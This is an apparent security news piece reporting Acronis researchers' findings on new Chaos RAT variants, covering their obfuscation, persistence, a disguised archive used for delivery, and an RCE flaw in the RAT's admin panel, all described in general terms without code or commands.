The open-source remote admin tool has been hijacked by threat actors for stealthy attacks, persistence, and potential ransomware deployment across platforms.
Acronis Threat Research Unit (TRU) has uncovered newly evolved variants of the Chaos Remote Access Trojan (RAT), a cross-platform tool now being widely abused in the wild to target both Linux and Windows systems. Originally created as a legitimate open-source remote management utility on GitHub, Chaos RAT is rapidly becoming a favorite among cybercriminals for its stealth, flexibility, and low detection footprint.
The latest samples identified by Acronis TRU researchers reveal a concerning trend: Chaos RAT is evolving with expanded platform compatibility, enhanced obfuscation techniques, and stronger persistence mechanisms. While it remains less prevalent than more mainstream malware families, its ability to bypass endpoint defenses and maintain undetected access is making it a valuable tool for espionage, data theft, and even ransomware deployment.
“Open-source flexibility is a double-edged sword—Chaos RAT shows how quickly useful tools can become dangerous,” said Candid Wüest, VP of Research at Acronis. “This is a wake-up call for defenders to monitor not just traditional threats but also emerging abuse of open-source software in cybercrime supply chains.”
“Open-source flexibility is a double-edged sword—Chaos RAT shows how quickly useful tools can become dangerous.” — Candid Wüest, VP of Research, Acronis
Acronis also disclosed a critical vulnerability within Chaos RAT’s web-based admin panel that allows remote code execution (RCE) on the hosting server. While this flaw doesn’t directly harm end-user machines, it underscores the insecure development practices behind some open-source tools and opens doors for malicious operators to hijack others’ infrastructure.
In one recent incident, a malware sample submitted from India to VirusTotal revealed the payload hidden inside a seemingly harmless file named NetworkAnalyzer.tar.gz. The file likely posed as a Linux network troubleshooting utility, indicating phishing or compromised website delivery.
Earlier campaigns using Chaos RAT relied on cron job persistence techniques common in Unix systems, often combined with crypto-miners. However, newer variants show significant evolution—shifting from plaintext configuration files to base64-encoded blobs with additional decoding layers, aiming to thwart reverse engineering.
This discovery highlights growing threats from weaponized open-source tools and emphasizes the need for enhanced threat detection, especially in Linux environments often overlooked in enterprise security frameworks.